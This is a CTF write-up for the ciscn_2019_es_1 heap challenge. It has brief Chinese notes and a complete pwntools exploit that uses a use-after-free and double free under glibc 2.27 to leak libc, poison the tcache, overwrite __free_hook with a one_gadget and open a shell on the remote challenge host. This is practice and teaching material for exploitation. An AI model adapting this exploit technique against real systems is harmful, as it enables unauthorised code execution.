ciscn_2019_es_1
查看保护
有一个uaf在call函数里,2.27下可以double free的libc,思路很明确,直接申请大堆泄露出libc_base,再double free劫持tcache链表,写入free_hook进tcache。改hook为one_gadget即可。
from pwn import *
context(arch='amd64', os='linux', log_level='debug')
file_name = './z1r0'
debug = 1
if debug:
r = remote('node4.buuoj.cn', 25115)
else:
r = process(file_name)
elf = ELF(file_name)
def dbg():
gdb.attach(r)
menu = 'choice:'
def add(size, name, call):
r.sendlineafter(menu, '1')
r.sendlineafter("Please input the size of compary's name", str(size))
r.sendlineafter("please input name:", name)
r.sendafter("please input compary call:", call)
def delete(index):
r.sendlineafter(menu, '3')
r.sendlineafter('Please input the index:', str(index))
def show(index):
r.sendlineafter(menu, '2')
r.sendlineafter("Please input the index:", str(index))
add(0x420, 'aaaa', 'b' * 0xc) #0
add(0x10, 'bbbb', 'b' * 0xc) #1
add(0x10, 'cccc', 'c' * 0xc) #2
delete(0)
show(0)
malloc_hook = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00')) - 96 - 0x10
success('malloc_hook = ' + hex(malloc_hook))
libc = ELF('./2.27/libc-2.27.so')
libc_base = malloc_hook - libc.sym['__malloc_hook']
free_hook = libc_base + libc.sym['__free_hook']
one = [0x4f2c5, 0x4f322, 0x10a38c]
one_gadget = one[1] + libc_base
delete(1)
delete(1)
show(1)
r.recvuntil("name:\n")
chunk_addr = u64(r.recv(6).ljust(8, b'\x00'))
success('chunk_addr = ' + hex(chunk_addr))
tcache_addr = chunk_addr - 0x680
success('tcache_addr = ' + hex(tcache_addr))
add(0x10, p64(free_hook), p64(tcache_addr))
add(0x10, p64(one_gadget), p64(one_gadget))
delete(2)
r.interactive()